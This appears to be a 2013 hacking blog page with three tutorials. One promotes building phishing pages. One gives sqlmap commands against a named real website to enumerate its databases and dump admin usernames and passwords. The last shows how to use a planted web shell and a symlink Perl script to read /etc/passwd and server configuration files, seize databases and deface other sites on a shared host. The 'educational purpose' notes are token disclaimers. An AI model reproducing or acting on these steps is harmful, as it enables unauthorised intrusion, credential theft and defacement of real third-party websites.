Ethical Leets

31 August 2013

How To Make Phishing Page Easy Tutorial

In the name of Allah , the gracious and merciful.

Hello everyone I am back with a easy tutorial of making an phishing page see the video below to learn :).

Author: JinX!

Note: This website is not responsible for any illegal activity from this guide. This guide is only for Education purpose.

Posted on Saturday, August 31, 2013 by Ethicall33ts

2 comments

30 August 2013

How To Hack Database Using SQLMAP

In the name of Allah, most gracious and merciful

Assalam O Alaikum guys today i m going to teach you how to use SQLMAP for extracting database details.In this tutorial i am using Backtrack if you want to download backtrack download it here , and the tool we are using is sqlmap.

Let's Begin

Go to backtrack i m using backtrack on my Vmware Workstation. ( Virtual PC ).

Now open SQLMAP you can open it by 2 method's.

First is by putting this command on the terminal >> cd /pentest/web/scanners/sqlmap . Shown in the image below.

And the other is by clicking on Accessories>>Backtrack Tools>>Exploitation Tools>>Web Exploitation Tools>>sqlmap . Shown in the image below.

When sqlmap terminal is opened start injecting now , i m using a Sqli Vulnerable Website , you can search more SQLi Vulnerable Website From The SQLi Scanner click here

We are using these parameter's in this guide

--dbs = Enumerate DBMS databases
-D = DB = DBMS database to enumerate
-T = TBL = DBMS database table to enumerate
-C = Col = DBMS database column to enumerate
--dump = Dump DBMS database table entries

--dump-all = Dump ALL DBMS database Table entries.

when you get your vulnerable website copy that link and open sqlmap terminal and type like this

./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 --dbs

and press enter.

it will find the databases of the websites you also use this command for finding only current database

./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 --current-dbs

but i prefer to use --dbs for all databases.Once you have your database you're next step is finding the tables of the database.

./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 -D raahauges_com_cms --columns

Where " raahauges_com_com " is the current database of the website we're using. and again press enter and it will collect/gather all the tables of this database.

and after some time it will show you all the tables in the databases . as shown in the image below.

When you done with tables find in which table admin password is stored by guessing it .

and type this command to extract that table.

./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 -D raahauges_com_cms -T admin --columns

and you'll get all the columns of the table admin , now you have to extract the admin username and password.

so type this command

./sqlmap.py -u http://www.raahauges.com/view-news.php?id=8 -D raahauges_com_cms -T admin -C uname,upwd --dump

where "uname" and "upwd" is the column name of my target database. you have to put your target column name here.

and it will show you the username and password detail of the admin . :)

Note : In this website there's no admin table that's why can't show you more screenshots :D

you can try at your own all commands are given here :)

Enjoy , Happy Hacking

Only For Educational Purpose..

Posted on Friday, August 30, 2013 by Ethicall33ts

No comments

29 August 2013

How To Do Symlinking In Web-Server To Deface All Websites Hosted On A Server

In the name of Allah, most gracious and merciful

Hello everyone today I am going to teach you how to do symlinking in web server (shelled web server).In this tutorial we will discuss about different method's for symlinking and bypassing it .

There are many method's on the internet so we will discuss the easiet method here .

Let's Get Started .

Things You Need :-

1. Shelled Website.

2. Perl Script download it here.
3. I am using 4041.php Shell you can download the shell by click here.

So we have our shell over here you can see the image below.

Now we will create a new directory named abc ( you can create with any name ) in this tut i m using abc for e.g ;) see the image below.

type your directory name and click the blue highlighted button which means execute this command in linux you can make directory by typing this command : mkdir abc <---- ( this is linux command which is used to create new directory ) .

Now open your newly created directory and upload the perl script that you downloaded from the link in the things you need title, if you got confused see the image below.

Now that you uploaded the perl script change it's permission to 0755. by typing this command to execute column >> chmod 0755 go.pl and then press the >> to change the permission to 0755 .

Now click on the Sec.Info Highlighted in red in the below image.

now you'll find Readable /etc/passwd: yes [view] and click on view and this screen will appear.

Copy all this and go to the perl script that you uploaded on the website

for eg: www.example.com/abc/go.pl

open like this not in shell , and click on paste , and click on config when done go to abc folder from your browser for eg: www.example.com/abc/

you will see the whole server configuration files for the database and you can login in to the database and change the admin password with your hash and you can also hack the other website hosted on the same web server..

i will soon make video of it shortly till then take care bubye :)

Note : Only For Educational Purpose :)

Author : JinX!

Posted on Thursday, August 29, 2013 by Ethicall33ts

1 comment